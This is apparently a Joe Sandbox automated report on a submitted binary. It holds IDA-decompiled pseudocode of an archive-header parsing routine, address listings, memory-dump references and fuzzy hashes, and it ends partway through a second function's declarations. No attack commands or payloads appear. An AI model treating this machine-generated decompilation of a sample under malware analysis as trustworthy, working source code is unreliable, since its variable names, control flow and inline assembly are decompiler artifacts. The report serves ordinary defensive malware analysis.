				void* _t541;
				intOrPtr _t546;
				void* _t547;
				void* _t548;
				void* _t549;
				intOrPtr _t559;

				_t397 = __ecx;
				_t549 = _t548 - 0x68;
				E00A1E554(E00A31FDB, _t547);
				E00A1E630();
				_t395 = _t397;
				E00A0C769(_t547 + 0x30, _t395);
				 *(_t547 + 0x60) = 0;
				 *((intOrPtr*)(_t547 - 4)) = 0;
				if( *((intOrPtr*)(_t395 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t547 + 0x6a)) = 0;
					L16:
					_push(7);
					if(E00A0C974() >= 7) {
						 *(_t395 + 0x21f4) = 0;
						_t511 = _t395 + 0x21e4;
						 *_t511 = E00A0C7E4(_t547 + 0x30);
						_t533 = E00A0C950(_t547 + 0x30, 4);
						_t242 = E00A0C8E4(_t500);
						__eflags = _t242 | _t500;
						if((_t242 | _t500) == 0) {
							L85:
							E00A01FD3(_t395);
							L86:
							E00A015C2(_t547 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t547 - 0xc));
							return  *(_t547 + 0x60);
						}
						__eflags = _t533;
						if(_t533 == 0) {
							goto L85;
						}
						_t42 = _t533 - 3; // -3
						_t536 = _t533 + 4 + _t242;
						_t410 = _t42 + _t242;
						__eflags = _t410;
						 *(_t547 + 0x64) = _t536;
						if(_t410 < 0) {
							goto L85;
						}
						__eflags = _t536 - 7;
						if(_t536 < 7) {
							goto L85;
						}
						_push(_t410);
						E00A0C974();
						__eflags =  *(_t547 + 0x48) - _t536;
						if( *(_t547 + 0x48) < _t536) {
							goto L17;
						}
						_t248 = E00A0C8C4(_t547 + 0x30);
						 *(_t395 + 0x21e8) = E00A0C8E4(_t500);
						_t250 = E00A0C8E4(_t500);
						 *(_t395 + 0x21ec) = _t250;
						__eflags =  *_t511 - _t248;
						 *(_t395 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t395 + 0x21f0) =  *(_t547 + 0x64);
						_t254 =  *(_t395 + 0x21e8);
						 *(_t395 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t511 != _t248;
						 *(_t547 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t395 + 0x21ec) & 0x00000001;
							 *(_t547 + 0x58) = 0;
							 *(_t547 + 0x54) = 0;
							if(( *(_t395 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t395 + 0x21ec) & 0x00000002;
								_t538 = _t256;
								 *(_t547 + 0x64) = _t256;
								 *(_t547 + 0x5c) = _t256;
								if(( *(_t395 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E00A0C8E4(_t500);
									_t538 = _t362;
									 *(_t547 + 0x64) = _t362;
									 *(_t547 + 0x5c) = _t500;
								}
								_t257 = E00A01944(_t395,  *(_t395 + 0x21f0));
								_t501 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t395 + 0x6ca8)) = E00A03DF5( *((intOrPtr*)(_t395 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t395 + 0x6ca4)), _t538,  *(_t547 + 0x5c), _t501, _t501);
								 *((intOrPtr*)(_t395 + 0x6cac)) = _t501;
								_t502 =  *(_t395 + 0x21e8);
								__eflags = _t502 - 1;
								if(__eflags == 0) {
									E00A0AEBC(_t395 + 0x2208);
									_t420 = 5;
									memcpy(_t395 + 0x2208, _t511, _t420 << 2);
									_t503 = E00A0C8E4(_t502);
									 *(_t395 + 0x6cb5) = _t503 & 1;
									 *(_t395 + 0x6cb4) = _t503 >> 0x00000002 & 1;
									 *(_t395 + 0x6cb7) = _t503 >> 0x00000004 & 1;
									_t432 = 1;
									 *((char*)(_t395 + 0x6cba)) = 1;
									 *(_t395 + 0x6cbb) = _t503 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t395 + 0x6cb8)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = E00A0C8E4(_t503);
										_t270 = 0;
										_t432 = 1;
									}
									__eflags =  *(_t395 + 0x6cb5);
									if( *(_t395 + 0x6cb5) == 0) {
										L81:
										_t432 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t395 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t395 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t395 + 0x6cb9)) = _t432;
											_t433 =  *(_t547 + 0x58);
											__eflags = _t433 |  *(_t547 + 0x54);
											if((_t433 |  *(_t547 + 0x54)) != 0) {
												E00A020E7(_t395, _t547 + 0x30, _t433, _t395 + 0x2208);
											}
											L84:
											 *(_t547 + 0x60) =  *(_t547 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t502 - 3;
								if(_t502 <= 3) {
									__eflags = _t502 - 2;
									_t120 = (0 | _t502 != 0x00000002) - 1; // -1
									_t519 = (_t120 & 0xffffdcb0) + 0x45d0 + _t395;
									 *(_t547 + 0x2c) = _t519;
									E00A0AE22(_t519, 0);
									_t438 = 5;
									memcpy(_t519, _t395 + 0x21e4, _t438 << 2);
									_t541 =  *(_t547 + 0x2c);
									 *(_t547 + 0x60) =  *(_t395 + 0x21e8);
									 *(_t541 + 0x1058) =  *(_t547 + 0x64);
									 *((char*)(_t541 + 0x10f9)) = 1;
									 *(_t541 + 0x105c) =  *(_t547 + 0x5c);
									 *(_t541 + 0x1094) = E00A0C8E4(_t502);
									 *(_t541 + 0x1060) = E00A0C8E4(_t502);
									_t289 =  *(_t541 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t541 + 0x1064) = _t502;
									 *(_t541 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t541 + 0x1060) = 0x7fffffff;
										 *(_t541 + 0x1064) = 0x7fffffff;
									}
									_t442 =  *(_t541 + 0x105c);
									_t522 =  *(_t541 + 0x1064);
									_t290 =  *(_t541 + 0x1058);
									_t504 =  *(_t541 + 0x1060);
									__eflags = _t442 - _t522;
									if(__eflags < 0) {
										L51:
										_t290 = _t504;
										_t442 = _t522;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t541 + 0x106c) = _t442;
											 *(_t541 + 0x1068) = _t290;
											_t291 = E00A0C8E4(_t504);
											__eflags =  *(_t541 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t541 + 0x24)) = _t291;
											if(( *(_t541 + 0x1094) & 0x00000002) != 0) {
												E00A1108D(_t541 + 0x1040, _t504, E00A0C7E4(_t547 + 0x30), 0);
											}
											 *(_t541 + 0x1070) =  *(_t541 + 0x1070) & 0x00000000;
											__eflags =  *(_t541 + 0x1094) & 0x00000004;
											if(( *(_t541 + 0x1094) & 0x00000004) != 0) {
												 *(_t541 + 0x1070) = 2;
												 *((intOrPtr*)(_t541 + 0x1074)) = E00A0C7E4(_t547 + 0x30);
											}
											 *(_t541 + 0x1100) =  *(_t541 + 0x1100) & 0x00000000;
											_t292 = E00A0C8E4(_t504);
											 *(_t547 + 0x64) = _t292;
											 *(_t541 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t450 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t541 + 0x1c)) = _t450;
											__eflags = _t450 - 0x32;
											if(_t450 != 0x32) {
												 *((intOrPtr*)(_t541 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t541 + 0x18)) = E00A0C8E4(_t504);
											_t523 = E00A0C8E4(_t504);
											 *(_t541 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t541 + 0x18));
											 *(_t541 + 0x10f8) =  *(_t395 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t541 + 0x10fc;
													 *_t177 =  *(_t541 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t541 + 0x10fc) = 1;
											}
											_t456 =  *(_t541 + 8);
											 *(_t541 + 0x1098) = _t456 >> 0x00000003 & 1;
											 *(_t541 + 0x10fa) = _t456 >> 0x00000005 & 1;
											__eflags =  *(_t547 + 0x60) - 2;
											_t459 =  *(_t547 + 0x64);
											 *(_t541 + 0x1099) = _t456 >> 0x00000004 & 1;
											if( *(_t547 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t459 & 0x00000040;
												if((_t459 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t541 + 0x10f0)) = _t302;
												_t304 =  *(_t541 + 0x1094) & 1;
												 *(_t541 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t541 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t541 + 0x109c) =  ~( *(_t541 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t523 - 0x1fff;
												if(_t523 >= 0x1fff) {
													_t523 = 0x1fff;
												}
												E00A0C846(_t547 + 0x30, _t547 - 0x2074, _t523);
												 *((char*)(_t547 + _t523 - 0x2074)) = 0;
												_push(0x800);
												_t524 = _t541 + 0x28;
												_push(_t541 + 0x28);
												_push(_t547 - 0x2074);
												E00A11748();
												_t463 =  *(_t547 + 0x58);
												__eflags = _t463 |  *(_t547 + 0x54);
												if((_t463 |  *(_t547 + 0x54)) != 0) {
													E00A020E7(_t395, _t547 + 0x30, _t463, _t541);
												}
												_t319 =  *(_t547 + 0x60);
												__eflags =  *(_t547 + 0x60) - 2;
												if( *(_t547 + 0x60) != 2) {
													L72:
													_t320 = E00A238B9(_t319, _t524, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t395 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E00A02018(_t395, _t541);
													_t319 =  *(_t547 + 0x60);
													__eflags =  *(_t547 + 0x60) - 2;
													if( *(_t547 + 0x60) == 2) {
														L74:
														__eflags =  *(_t547 + 0x6b);
														if(__eflags != 0) {
															E00A06D72(__eflags, 0x1c, _t395 + 0x24, _t524);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t504;
										if(_t290 > _t504) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t502 - 4;
								if(_t502 == 4) {
									_t471 = 5;
									memcpy(_t395 + 0x2248, _t395 + 0x21e4, _t471 << 2);
									_t331 = E00A0C8E4(_t502);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t395 + 0x225c) = E00A0C8E4(_t502) & 0x00000001;
										_t335 = E00A0C797(_t547 + 0x30) & 0x000000ff;
										 *(_t395 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E00A0C846(_t547 + 0x30, _t395 + 0x2264, 0x10);
											__eflags =  *(_t395 + 0x225c);
											if( *(_t395 + 0x225c) != 0) {
												E00A0C846(_t547 + 0x30, _t395 + 0x2274, 8);
												E00A0C846(_t547 + 0x30, _t547 + 0x64, 4);
												E00A0FBA2(_t547 - 0x74);
												E00A0FBE8(_t547 - 0x74, _t395 + 0x2274, 8);
												_push(_t547 + 8);
												E00A0FAB1(_t547 - 0x74);
												_t350 = E00A2009A(_t547 + 0x64, _t547 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t395 + 0x225c) = _t352;
											}
											 *((char*)(_t395 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t547);
										E00A03F8F();
										E00A03F3A(_t395, _t395 + 0x24, _t547);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t502 - 5;
								if(_t502 == 5) {
									_t480 = _t502;
									memcpy(_t395 + 0x4590, _t395 + 0x21e4, _t480 << 2);
									 *(_t395 + 0x45ac) = E00A0C8E4(_t502) & 0x00000001;
									 *((short*)(_t395 + 0x45ae)) = 0;
									 *((char*)(_t395 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t485 = E00A0C8E4(_t500);
							 *(_t547 + 0x54) = _t500;
							_t256 = 0;
							 *(_t547 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t485 -  *(_t395 + 0x21f0);
							if(_t485 >=  *(_t395 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00A01FD3(_t395);
						 *((char*)(_t395 + 0x6cc4)) = 1;
						E00A06FBA(0xa40f50, 3);
						__eflags =  *((char*)(_t547 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00A06D72(__eflags, 4, _t395 + 0x24, _t395 + 0x24);
							 *((char*)(_t395 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00A03EF9(_t395, _t500);
					goto L86;
				}
				_t500 =  *((intOrPtr*)(_t395 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t559 =  *((intOrPtr*)(_t395 + 0x6ca4));
				if(_t559 < 0 || _t559 <= 0 &&  *((intOrPtr*)(_t395 + 0x6ca0)) <= _t500) {
					goto L15;
				} else {
					 *((char*)(_t547 + 0x6a)) = 1;
					 *0xa33260(_t547 + 0x18, 0x10);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t395 + 0xc))))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t547 + 0x6b) = 1;
						L8:
						E00A03D65(_t395);
						_t531 = _t395 + 0x2264;
						_t546 = _t395 + 0x1028;
						E00A061C9(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t395 + 0x2264, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
						if( *(_t395 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t547 + 0x50)) = _t546;
							goto L16;
						} else {
							_t379 = _t395 + 0x2274;
							while(1) {
								_t381 = E00A2009A(_t547 + 0x28, _t379, 8);
								_t549 = _t549 + 0xc;
								if(_t381 == 0) {
									goto L13;
								}
								_t566 =  *(_t547 + 0x6b);
								_t382 = _t395 + 0x24;
								_push(_t382);
								_push(_t382);
								if( *(_t547 + 0x6b) != 0) {
									_push(6);
									E00A06D72(__eflags);
									 *((char*)(_t395 + 0x6cc5)) = 1;
									E00A06FBA(0xa40f50, 0xb);
									goto L86;
								}
								_push(0x80);
								E00A06D72(_t566);
								E00A0EE02( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024);
								E00A03D65(_t395);
								E00A061C9(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t531, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
								_t379 = _t395 + 0x2274;
								if( *(_t395 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t393 = E00A1166E();
					 *(_t547 + 0x6b) = 0;
					if(_t393 == 0) {
						goto L8;
					}
					goto L7;
				}
			}





























































                                                        0x00a03206
                                                        0x00a03207
                                                        0x00a0320f
                                                        0x00a03219
                                                        0x00a03220
                                                        0x00a03227
                                                        0x00a0322e
                                                        0x00a03231
                                                        0x00a0323a
                                                        0x00a03390
                                                        0x00a03390
                                                        0x00a03393
                                                        0x00a03393
                                                        0x00a033a0
                                                        0x00a033b1
                                                        0x00a033b8
                                                        0x00a033c8
                                                        0x00a033d2
                                                        0x00a033d4
                                                        0x00a033db
                                                        0x00a033dd
                                                        0x00a03a0d
                                                        0x00a03a0f
                                                        0x00a03a14
                                                        0x00a03a17
                                                        0x00a03a25
                                                        0x00a03a30
                                                        0x00a03a30
                                                        0x00a033e3
                                                        0x00a033e5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a033eb
                                                        0x00a033f1
                                                        0x00a033f3
                                                        0x00a033f3
                                                        0x00a033f5
                                                        0x00a033f8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a033fe
                                                        0x00a03401
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03407
                                                        0x00a0340b
                                                        0x00a03410
                                                        0x00a03413
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03418
                                                        0x00a0342a
                                                        0x00a03430
                                                        0x00a03435
                                                        0x00a03440
                                                        0x00a03442
                                                        0x00a0344b
                                                        0x00a03451
                                                        0x00a03457
                                                        0x00a0345d
                                                        0x00a03460
                                                        0x00a03463
                                                        0x00a03465
                                                        0x00a0349f
                                                        0x00a0349f
                                                        0x00a034a1
                                                        0x00a034a8
                                                        0x00a034ab
                                                        0x00a034ae
                                                        0x00a034d8
                                                        0x00a034d8
                                                        0x00a034df
                                                        0x00a034e1
                                                        0x00a034e4
                                                        0x00a034e7
                                                        0x00a034ec
                                                        0x00a034f1
                                                        0x00a034f3
                                                        0x00a034f6
                                                        0x00a034f6
                                                        0x00a03501
                                                        0x00a0350e
                                                        0x00a0351d
                                                        0x00a03526
                                                        0x00a0352e
                                                        0x00a03535
                                                        0x00a0353b
                                                        0x00a0353d
                                                        0x00a0394e
                                                        0x00a0395d
                                                        0x00a0395e
                                                        0x00a03968
                                                        0x00a03971
                                                        0x00a0397e
                                                        0x00a0398d
                                                        0x00a03998
                                                        0x00a0399b
                                                        0x00a039a1
                                                        0x00a039a7
                                                        0x00a039a9
                                                        0x00a039af
                                                        0x00a039b2
                                                        0x00a039c9
                                                        0x00a039b4
                                                        0x00a039bc
                                                        0x00a039c4
                                                        0x00a039c6
                                                        0x00a039c6
                                                        0x00a039cf
                                                        0x00a039d6
                                                        0x00a039e0
                                                        0x00a039e0
                                                        0x00000000
                                                        0x00a039d8
                                                        0x00a039d8
                                                        0x00a039de
                                                        0x00a039e2
                                                        0x00a039e2
                                                        0x00a039e8
                                                        0x00a039ed
                                                        0x00a039f0
                                                        0x00a03a00
                                                        0x00a03a00
                                                        0x00a03a05
                                                        0x00a03a08
                                                        0x00000000
                                                        0x00a03a08
                                                        0x00000000
                                                        0x00a039de
                                                        0x00a039d6
                                                        0x00a03543
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03549
                                                        0x00a0354c
                                                        0x00a0368e
                                                        0x00a03696
                                                        0x00a036a5
                                                        0x00a036a9
                                                        0x00a036ac
                                                        0x00a036b3
                                                        0x00a036ba
                                                        0x00a036c5
                                                        0x00a036c8
                                                        0x00a036ce
                                                        0x00a036d7
                                                        0x00a036de
                                                        0x00a036ec
                                                        0x00a036f7
                                                        0x00a03706
                                                        0x00a03706
                                                        0x00a03708
                                                        0x00a0370e
                                                        0x00a03714
                                                        0x00a0371b
                                                        0x00a03721
                                                        0x00a03721
                                                        0x00a03727
                                                        0x00a0372d
                                                        0x00a03733
                                                        0x00a03739
                                                        0x00a0373f
                                                        0x00a03741
                                                        0x00a03749
                                                        0x00a03749
                                                        0x00a0374b
                                                        0x00000000
                                                        0x00a03743
                                                        0x00a03743
                                                        0x00a0374d
                                                        0x00a0374d
                                                        0x00a03756
                                                        0x00a0375c
                                                        0x00a03761
                                                        0x00a03768
                                                        0x00a0376b
                                                        0x00a0377e
                                                        0x00a0377e
                                                        0x00a03783
                                                        0x00a0378a
                                                        0x00a03791
                                                        0x00a03796
                                                        0x00a037a5
                                                        0x00a037a5
                                                        0x00a037ab
                                                        0x00a037b5
                                                        0x00a037bc
                                                        0x00a037c5
                                                        0x00a037cd
                                                        0x00a037d0
                                                        0x00a037d3
                                                        0x00a037d6
                                                        0x00a037d8
                                                        0x00a037d8
                                                        0x00a037ea
                                                        0x00a037fe
                                                        0x00a03800
                                                        0x00a0380a
                                                        0x00a0380f
                                                        0x00a03815
                                                        0x00a03817
                                                        0x00a03821
                                                        0x00a03823
                                                        0x00a03825
                                                        0x00a03825
                                                        0x00a03825
                                                        0x00a03825
                                                        0x00a03819
                                                        0x00a03819
                                                        0x00a03819
                                                        0x00a0382c
                                                        0x00a03836
                                                        0x00a03848
                                                        0x00a0384e
                                                        0x00a03852
                                                        0x00a03855
                                                        0x00a0385b
                                                        0x00a03866
                                                        0x00a03866
                                                        0x00a03866
                                                        0x00000000
                                                        0x00a0385d
                                                        0x00a0385d
                                                        0x00a03860
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03862
                                                        0x00a03868
                                                        0x00a03868
                                                        0x00a03874
                                                        0x00a03879
                                                        0x00a0388e
                                                        0x00a03894
                                                        0x00a038a3
                                                        0x00a038a8
                                                        0x00a038b3
                                                        0x00a038b5
                                                        0x00a038b7
                                                        0x00a038b7
                                                        0x00a038c4
                                                        0x00a038c9
                                                        0x00a038d7
                                                        0x00a038dc
                                                        0x00a038df
                                                        0x00a038e0
                                                        0x00a038e1
                                                        0x00a038e6
                                                        0x00a038eb
                                                        0x00a038ee
                                                        0x00a038f8
                                                        0x00a038f8
                                                        0x00a038fd
                                                        0x00a03900
                                                        0x00a03903
                                                        0x00a03915
                                                        0x00a0391b
                                                        0x00a03922
                                                        0x00a03924
                                                        0x00a03926
                                                        0x00a03926
                                                        0x00000000
                                                        0x00a03905
                                                        0x00a03908
                                                        0x00a0390d
                                                        0x00a03910
                                                        0x00a03913
                                                        0x00a0392d
                                                        0x00a0392d
                                                        0x00a03931
                                                        0x00a0393e
                                                        0x00a0393e
                                                        0x00000000
                                                        0x00a03931
                                                        0x00000000
                                                        0x00a03913
                                                        0x00a03903
                                                        0x00a0385b
                                                        0x00a03745
                                                        0x00a03747
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03747
                                                        0x00a03741
                                                        0x00a03552
                                                        0x00a03555
                                                        0x00a03596
                                                        0x00a035a3
                                                        0x00a035a8
                                                        0x00a035ad
                                                        0x00a035af
                                                        0x00a035e6
                                                        0x00a035f1
                                                        0x00a035f4
                                                        0x00a035fa
                                                        0x00a035fd
                                                        0x00a03613
                                                        0x00a03618
                                                        0x00a0361f
                                                        0x00a0362d
                                                        0x00a0363b
                                                        0x00a03644
                                                        0x00a03650
                                                        0x00a03658
                                                        0x00a0365d
                                                        0x00a0366c
                                                        0x00a03676
                                                        0x00a03678
                                                        0x00a03678
                                                        0x00a0367a
                                                        0x00a0367a
                                                        0x00a03680
                                                        0x00000000
                                                        0x00a03680
                                                        0x00a035ff
                                                        0x00a03600
                                                        0x00a035b7
                                                        0x00a035ba
                                                        0x00a035bc
                                                        0x00a035bd
                                                        0x00a035cf
                                                        0x00000000
                                                        0x00a035cf
                                                        0x00a035b1
                                                        0x00a035b2
                                                        0x00000000
                                                        0x00a035b2
                                                        0x00a03557
                                                        0x00a0355a
                                                        0x00a03561
                                                        0x00a0356e
                                                        0x00a0357a
                                                        0x00a03582
                                                        0x00a03589
                                                        0x00a03589
                                                        0x00000000
                                                        0x00a0355a
                                                        0x00a034b8
                                                        0x00a034ba
                                                        0x00a034bd
                                                        0x00a034bf
                                                        0x00a034c2
                                                        0x00a034c4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a034c6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a034cc
                                                        0x00a034d2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a034d2
                                                        0x00a03469
                                                        0x00a03475
                                                        0x00a0347c
                                                        0x00a03481
                                                        0x00a03485
                                                        0x00000000
                                                        0x00a03487
                                                        0x00a0348e
                                                        0x00a03493
                                                        0x00000000
                                                        0x00a03493
                                                        0x00a03485
                                                        0x00a033a2
                                                        0x00a033a4
                                                        0x00000000
                                                        0x00a033a4
                                                        0x00a03248
                                                        0x00a0324b
                                                        0x00a0324d
                                                        0x00a03253
                                                        0x00000000
                                                        0x00a03267
                                                        0x00a0326f
                                                        0x00a03278
                                                        0x00a03285
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03298
                                                        0x00a032a7
                                                        0x00a032a7
                                                        0x00a032ab
                                                        0x00a032ad
                                                        0x00a032c9
                                                        0x00a032d5
                                                        0x00a032e1
                                                        0x00a032ed
                                                        0x00a0336c
                                                        0x00a0336c
                                                        0x00000000
                                                        0x00a032ef
                                                        0x00a032ef
                                                        0x00a032f5
                                                        0x00a032fc
                                                        0x00a03301
                                                        0x00a03306
                                                        0x00000000
                                                        0x00000000
                                                        0x00a03308
                                                        0x00a0330c
                                                        0x00a0330f
                                                        0x00a03310
                                                        0x00a03311
                                                        0x00a03371
                                                        0x00a03373
                                                        0x00a0337f
                                                        0x00a03386
                                                        0x00000000
                                                        0x00a03386
                                                        0x00a03313
                                                        0x00a03318
                                                        0x00a03329
                                                        0x00a03330
                                                        0x00a03358
                                                        0x00a03364
                                                        0x00a0336a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0336a
                                                        0x00000000
                                                        0x00a032f5
                                                        0x00a032ed
                                                        0x00a0329a
                                                        0x00a0329f
                                                        0x00a032a5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a032a5

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog_memcmp
                                                        • String ID: CMT$h%u$hc%u
                                                        • API String ID: 3004599000-3282847064
                                                        • Opcode ID: b4a0131423d2d763774d1f262f55d7ff858f2c0ddcb523928a781da6fc37efb9
                                                        • Instruction ID: 02d4c0ca95180373bea30d84821a6511754a376aa14279987e41ed90ba74532e
                                                        • Opcode Fuzzy Hash: b4a0131423d2d763774d1f262f55d7ff858f2c0ddcb523928a781da6fc37efb9
                                                        • Instruction Fuzzy Hash: 6132C3726103889FDF14DF74D995AEA37A9AF55300F04457EFD8A8B2C2DB709A48CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2D35E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODECrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E00A2D35E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t778;
				signed int _t779;
				signed int _t785;
				signed int _t791;
				intOrPtr _t793;
				void* _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t806;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t828;
				signed int _t829;
				signed int _t835;
				signed int _t836;
				signed int _t839;
				signed int _t844;
				signed int _t852;
				signed int* _t855;
				signed int _t859;
				signed int _t870;
				signed int _t871;
				signed int _t873;
				char* _t874;
				signed int _t877;
				signed int _t881;
				signed int _t882;
				signed int _t887;
				signed int _t889;
				signed int _t894;
				signed int _t903;
				signed int _t906;
				signed int _t908;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t916;
				signed int _t929;
				signed int _t930;
				signed int _t932;
				char* _t933;
				signed int _t936;
				signed int _t940;
				signed int _t941;
				signed int* _t943;
				signed int _t946;
				signed int _t948;
				signed int _t953;
				signed int _t961;
				signed int _t964;
				signed int _t968;
				signed int* _t975;
				intOrPtr _t977;
				void* _t978;
				intOrPtr* _t980;
				signed int* _t984;
				unsigned int _t995;
				signed int _t996;
				void* _t999;
				signed int _t1000;
				void* _t1002;
				signed int _t1003;
				signed int _t1004;
				signed int _t1005;
				signed int _t1015;
				signed int _t1020;
				signed int _t1023;
				unsigned int _t1026;
				signed int _t1027;
				void* _t1030;
				signed int _t1031;
				void* _t1033;
				signed int _t1034;
				signed int _t1035;
				signed int _t1036;
				signed int _t1041;
				signed int* _t1046;
				signed int _t1048;
				signed int _t1058;
				void _t1061;
				signed int _t1064;
				void* _t1067;
				void* _t1074;
